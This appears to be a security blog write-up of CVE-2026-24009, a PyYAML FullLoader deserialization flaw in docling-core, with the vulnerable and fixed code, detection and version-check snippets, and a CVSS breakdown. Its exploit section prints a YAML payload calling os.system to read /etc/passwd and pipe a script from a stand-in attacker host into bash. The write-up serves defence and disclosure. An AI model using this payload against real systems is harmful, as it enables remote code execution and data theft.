CVE-2026-24009

YAML Deserialization: The Gift That Keeps on Giving in Docling-Core

Alon Barad
Software Engineer

Jan 23, 2026 · 5 min read

Executive Summary (TL;DR)

The `docling-core` library, used for processing and modeling documents, contained a critical vulnerability in its YAML loading mechanism. By explicitly using `yaml.FullLoader` instead of `SafeLoader`, the library allowed the deserialization of arbitrary Python objects. This means if you can get the application to parse a malicious YAML file, you can execute code on the server. The fix is a one-line change to `SafeLoader` in version 2.48.4.

A classic remote code execution vulnerability in the docling-core library caused by the insecure use of PyYAML's FullLoader, allowing attackers to turn document processing pipelines into remote shells.

The Hook: Parsing Untrusted Data Like It's 2015

In the world of secure coding, there are certain patterns that serve as giant neon signs pointing to a vulnerability. Using strcpy in C is one. Passing user input to eval() in JavaScript is another. And in the Python ecosystem, unpickling data or using insecure YAML loaders is the holy grail of 'oops, I just gave you root.'

docling-core is a library designed to handle the heavy lifting of document processing—converting PDFs, images, and other formats into structured data. It's the kind of library that sits deep inside enterprise AI pipelines, often running with significant resources to handle OCR and text extraction. This makes it a high-value target. If you can compromise the parser, you don't just break the application; you gain a foothold in the data processing backend.

The vulnerability here isn't novel; it's a regression to a solved problem. It revolves around how the library loads YAML configuration or document representations. Instead of treating the input as data, the library treated it as a blueprint for object instantiation. In simpler terms: the application trusted the file to tell it what code to run.

The Flaw: FullLoader vs. Common Sense

The root cause of CVE-2026-24009 is the explicit usage of yaml.FullLoader. To understand why this is a catastrophic error, we need to look at how PyYAML functions. In older versions of PyYAML, the default yaml.load() was unsafe because it would happily construct any Python object defined in the YAML tags. The community screamed, and PyYAML responded: version 5.1 began warning whenever yaml.load() was called without a Loader argument, and version 6.0 made the argument mandatory, encouraging safety.

However, yaml.FullLoader is not a safe loader; it exists for backward compatibility and for specific use cases where you trust the input. In PyYAML releases before 5.4 it can be made to resolve tags like !!python/object/apply and !!python/object/new (see CVE-2020-14343); from 5.4 onward those tags are handled only by UnsafeLoader. These tags tell PyYAML: 'Hey, don't just read this string; actually import this module and run this function with these arguments.'

The developer behind this code likely chose FullLoader because they wanted to support complex data structures or legacy YAML files without realizing the security implication. It’s the classic trade-off: developer convenience vs. security. In this case, convenience won, and security took a vacation. By using FullLoader on files that could potentially originate from an external user (a 'document'), the library opened a direct channel for Remote Code Execution (RCE).

The Code: One Line of Doom

Let's look at the smoking gun. The vulnerability existed in docling_core/types/doc/document.py. The function load_from_yaml takes a filename, opens it, and parses it. Here is the vulnerable implementation:

# The "Before" Code (Vulnerable)
def load_from_yaml(cls, filename: Union[str, Path]) -> "DoclingDocument":
    if isinstance(filename, str):
        filename = Path(filename)
    with open(filename, encoding="utf-8") as f:
        # CRITICAL FLAW: FullLoader allows arbitrary object instantiation
        data = yaml.load(f, Loader=yaml.FullLoader)
    return DoclingDocument.model_validate(data)

It looks innocent enough, doesn't it? But that Loader=yaml.FullLoader argument is deadly. It explicitly selects a loader that is allowed to build more than plain data types. The fix, applied in version 2.48.4, was brutally simple:

# The "After" Code (Fixed)
def load_from_yaml(cls, filename: Union[str, Path]) -> "DoclingDocument":
    if isinstance(filename, str):
        filename = Path(filename)
    with open(filename, encoding="utf-8") as f:
        # REMEDIATION: SafeLoader restricts parsing to standard data types
        data = yaml.load(f, Loader=yaml.SafeLoader)
    return DoclingDocument.model_validate(data)

By switching to SafeLoader, the parser now treats the input strictly as data (strings, lists, dictionaries, integers) and rejects any Python-specific tag that tries to instantiate a class or call a function, raising a ConstructorError instead of building the object.
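The restriction can be observed directly. The following is a minimal sketch, assuming PyYAML is installed; the payload string and the helper name rejected_by_safe_loader are illustrative and not part of docling-core. SafeLoader has no constructor registered for Python-specific tags, so it refuses the document outright:

```python
import yaml

# Illustrative payload: a Python-specific tag wrapping a harmless command.
PAYLOAD = "!!python/object/apply:os.system\nargs: ['echo harmless']\n"


def rejected_by_safe_loader(text: str) -> bool:
    """Return True if SafeLoader refuses to construct the document."""
    try:
        yaml.load(text, Loader=yaml.SafeLoader)
    except yaml.constructor.ConstructorError:
        # SafeLoader has no constructor for python/* tags.
        return True
    return False


print(rejected_by_safe_loader(PAYLOAD))          # tagged document
print(rejected_by_safe_loader("title: hello"))   # plain data
```

Plain mappings, lists, and scalars load as before; only documents carrying tags outside the standard YAML set are refused.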

The Exploit: Weaponizing YAML

Exploiting this is trivially easy if you can feed a file to the load_from_yaml function. We don't need complex memory corruption or heap grooming. We just need to write valid YAML that PyYAML understands as 'run this command'.

A standard payload targeting FullLoader utilizes the subprocess or os modules. Here is what a malicious document.yaml looks like:

!!python/object/apply:os.system
args: ['id; cat /etc/passwd; curl http://attacker-c2.com/revshell | bash']

When the vulnerable docling-core code processes this file:

  1. It parses the tag !!python/object/apply:os.system.
  2. It resolves os.system.
  3. It calls that function with the provided args.
  4. The server executes the shell command.
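The first step can be inspected without executing anything. The sketch below, which assumes PyYAML is installed, uses yaml.compose to build only the node graph (no constructors run) and collects every tag in the Python-specific namespace that a constructing loader would then be asked to resolve. The function name python_tags and the harmless echo payload are illustrative.

```python
import yaml

# The "!!" shorthand expands to this prefix; python/* tags live under it.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"

PAYLOAD = "!!python/object/apply:os.system\nargs: ['echo harmless']\n"


def python_tags(text: str) -> list:
    """Collect Python-specific tags from a YAML document without constructing it."""
    found = []
    seen = set()
    stack = [yaml.compose(text, Loader=yaml.SafeLoader)]
    while stack:
        node = stack.pop()
        # compose() returns None for an empty document; anchors can create cycles.
        if node is None or id(node) in seen:
            continue
        seen.add(id(node))
        if node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.MappingNode):
            for key_node, value_node in node.value:
                stack.extend((key_node, value_node))
        elif isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
    return found


print(python_tags(PAYLOAD))
```

A scan like this is useful for triage or logging, but it is not a substitute for parsing with SafeLoader.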

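This attack vector is extremely reliable once the loader accepts the tag. Unlike memory corruption bugs, which might crash the service if the offsets are wrong, insecure deserialization is deterministic: if the gadget (in this case, os.system) is available in the runtime environment, the call happens. Since os is part of the Python standard library, it is always available. The main variable is the installed PyYAML release: the known FullLoader bypasses (such as CVE-2020-14343) affect versions before 5.4, and the exact tag a payload needs can differ between releases.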

The Impact: From Processing to Pwnage

The impact of this vulnerability is rated High (CVSS 8.1), and frankly, that might be conservative depending on where this library is deployed. RCE is the endgame.

If docling-core is running inside a Docker container processing user uploads, the attacker gets a shell inside that container. From there, they can attempt container escape, pivot to the cloud metadata service (e.g., AWS Instance Metadata Service), or poison the data pipeline.

Consider a scenario where this library is used to index corporate knowledge bases. An attacker uploads a malicious "policy document" formatted as YAML. The system indexes it, triggers the RCE, and suddenly the attacker has exfiltrated sensitive proprietary data. The integrity and confidentiality of the entire system are completely compromised.

The Fix: Just Use SafeLoader

The remediation is straightforward: Update to version 2.48.4. This version swaps the loader for yaml.SafeLoader. If you are a developer using PyYAML in your own projects, write this on a post-it note and stick it to your monitor: Never use yaml.load() without SafeLoader unless you personally wrote the file being loaded.
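To check whether an environment needs the upgrade, the installed version can be compared against the affected range listed for this CVE (>= 2.21.0, < 2.48.4). This is a rough sketch using only the standard library; the helper names are illustrative, and the parser assumes plain X.Y.Z release strings without pre-release suffixes.

```python
from importlib import metadata

FIRST_AFFECTED = (2, 21, 0)  # lower bound of the affected range
FIRST_FIXED = (2, 48, 4)     # release that switched to SafeLoader


def parse_version(version: str) -> tuple:
    """Turn 'X.Y.Z' into a tuple of ints (assumes a plain release string)."""
    return tuple(int(part) for part in version.split(".")[:3])


def is_affected(version: str) -> bool:
    """Return True if the version falls inside the affected range."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


def installed_docling_core_is_affected() -> bool:
    """Check the docling-core distribution installed in this environment."""
    try:
        return is_affected(metadata.version("docling-core"))
    except metadata.PackageNotFoundError:
        return False  # not installed, so nothing to upgrade


print(is_affected("2.48.3"), is_affected("2.48.4"))
```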

If upgrading is impossible for some bureaucratic reason (we've all been there), you can attempt to monkey-patch the loader or ensure strict input validation, but these are fragile defenses. The only true fix is ensuring the parser never attempts to construct complex Python objects from the input stream.
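One less fragile stopgap than monkey-patching is to bypass load_from_yaml and do the parsing yourself with SafeLoader, then hand the resulting plain data to the model. The sketch below assumes PyYAML is installed; load_yaml_data_safely is a hypothetical helper, and the model_validate step mirrors the library code quoted earlier but is left as a comment so the example runs without docling-core.

```python
import tempfile
from pathlib import Path
from typing import Any, Union

import yaml


def load_yaml_data_safely(filename: Union[str, Path]) -> Any:
    """Parse a YAML file into plain Python data using SafeLoader only."""
    with open(Path(filename), encoding="utf-8") as f:
        return yaml.safe_load(f)


# Demo with a throwaway file; a real caller would pass the uploaded path.
# The content is a placeholder, not a valid DoclingDocument.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp) / "document.yaml"
    sample.write_text("name: example\n", encoding="utf-8")
    data = load_yaml_data_safely(sample)

# With docling-core installed, the next step would mirror the library:
# doc = DoclingDocument.model_validate(data)
print(data)
```

This keeps the untrusted bytes away from FullLoader entirely, which is the property the upstream fix provides.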

Technical Appendix

CVSS Score
8.1 / 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
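
The 8.1 figure follows from the vector via the CVSS v3.1 base-score equations. Below is a sketch of that arithmetic for this vector only (scope unchanged); the weights are the published v3.1 values for each metric, and the function names are illustrative.

```python
import math

# CVSS v3.1 weights for AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AV_NETWORK = 0.85
AC_HIGH = 0.44
PR_NONE = 0.85
UI_NONE = 0.85
CIA_HIGH = 0.56  # same weight for C:H, I:H and A:H


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged() -> float:
    """Base score for the vector above (scope unchanged formulas)."""
    iss = 1 - (1 - CIA_HIGH) ** 3
    impact = 6.42 * iss
    exploitability = 8.22 * AV_NETWORK * AC_HIGH * PR_NONE * UI_NONE
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score_scope_unchanged())  # 8.1
```

The AC:H weight (0.44) is what keeps the score below the 9.8 that the same vector would get with AC:L.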

Affected Systems

docling-core < 2.48.4
Applications implementing docling-core for document ingestion
AI/ML pipelines using docling for data preprocessing

Affected Versions Detail

Product: docling-core (docling-project)
Affected Versions: >= 2.21.0, < 2.48.4
Fixed Version: 2.48.4

CWE ID: CWE-502
Attack Vector: Network
CVSS: 8.1 (High)
Impact: Remote Code Execution (RCE)
Vulnerable Component: docling_core.types.doc.DoclingDocument.load_from_yaml
Gadget Chain: PyYAML !!python/object/apply

CWE-502: Deserialization of Untrusted Data

The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Vulnerability Timeline

2025-10-01: Vulnerability identified and fixed in commit 3e8d628
2025-10-01: Version 2.48.4 released
2026-01-20: Formal CVE requested by reporter
2026-01-22: CVE-2026-24009 published
